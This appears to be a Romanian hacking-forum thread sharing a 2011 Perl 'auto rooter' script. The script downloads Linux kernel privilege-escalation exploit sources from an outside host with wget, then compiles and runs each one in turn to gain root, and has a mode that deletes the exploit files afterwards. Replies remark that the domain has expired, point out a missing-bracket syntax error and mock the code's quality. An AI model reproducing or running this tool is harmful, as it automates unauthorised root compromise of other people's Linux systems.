Jump to content
bebemic

Auto rooter by CrosS [2011]

Recommended Posts

Posted

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "# (Beta 1.0 ) Auto rooter by CrosS #\n";
print "# Usage : #\n";
print "# perl $0 root => To root #\n";
print "# perl $0 del => Delete Exploit #\n";
print "# #\n";
print "# as R00TW0RM - Private Community is back #\n";
print "# so Releasing 2011 auto rooter =) #\n";
print "# in case of error mailto: mr.0x0day[AT]live.com #\n";
print "# #\n";
print "# Thanks to: r0073r and L0rd CrusAd3r #\n";
print "# http://www.r00tw0rm.com/1337 #\n";
print "###########################################################\n\n\n";


if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

lol..scuze..This domain name expired on Feb 14 2012 12:11AM

dar se poate modifica cu localele pe care le aveti deja

Posted

Missing right curly or square bracket at autorooter line 60, at end of line

syntax error at autorooter line 60, at EOF

Execution of autorooter aborted due to compilation errors.

ai uitat sa copiezi si ultima }

Posted


system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");

Asta cred ca vinde castraveti la piata, nu e programator. De ce saracia te-ai chinui sa faci perl cu system() cand poti face bash direct. Si de ce mai da chmod 777 la binarul rezultat in urma compilarii ? Are deja permisiunile ok (755). Acolo da "system("id");" dupa executia fiecarui exploit insa nu are vreo variabila sa verifice daca are deja uid 0, caz in care daca esti uid 0, dupa primul expl. local, celalalte sunt executate la rand de pomana (si pot periclita intregul sistem, fiind rulate ca root)

Cyber Laba domne ...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...